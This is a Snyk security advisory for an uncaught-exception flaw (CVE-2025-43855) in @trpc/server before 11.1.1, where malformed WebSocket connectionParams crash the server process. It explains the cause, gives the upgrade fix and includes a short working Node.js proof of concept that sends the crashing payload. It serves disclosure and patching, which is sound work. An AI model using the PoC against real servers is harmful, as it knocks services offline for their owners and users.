Uncaught Exception Affecting @trpc/server package, versions <11.1.1


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.1% (29th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Uncaught Exception vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-TRPCSERVER-10060256
  • published8 May 2025
  • disclosed24 Apr 2025
  • creditLuke Childs

Introduced: 24 Apr 2025

NewCVE-2025-43855  (opens in a new tab)
CWE-248  (opens in a new tab)

How to fix?

Upgrade @trpc/server to version 11.1.1 or higher.

Overview

@trpc/server is a The tRPC server library

Affected versions of this package are vulnerable to Uncaught Exception via the createCtxPromise function. An attacker can cause the server to crash by sending malformed connectionParams during the WebSocket connection setup. Specifically, the parseConnectionParams function throws an error for malformed input, which is caught but then incorrectly re-thrown within the WebSocket adapter's createCtxPromise function. This re-thrown error becomes an uncaught exception in the WebSocket message event context, leading to the termination of the entire tRPC server process.

Note: This is only exploitable if the server has WebSockets enabled and uses the createContext method.

PoC

#!/usr/bin/env node

const TARGET = 'ws://localhost:3000'

// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation
const MALICIOUS_CONNECTION_PARAMS = JSON.stringify({
  method: "connectionParams",
  data: { invalidConnectionParams: null },
});

// Open a connection to the target
const target = `${TARGET}?connectionParams=1`;
console.log(`Opening a WebSocket to ${target}`);
const socket = new WebSocket(target);

// Wait for the connection to be established
socket.addEventListener("open", () => {
  console.log("WebSocket established!");

  // Sends a message to the WebSocket server.
  console.log(`Sending malicious connectionParams`);
  socket.send(MALICIOUS_CONNECTION_PARAMS);
  console.log(`Done!`);
});

// Handle errors
socket.addEventListener("error", () => console.log("Error opening WebSocket"));

CVSS Base Scores

version 4.0
version 3.1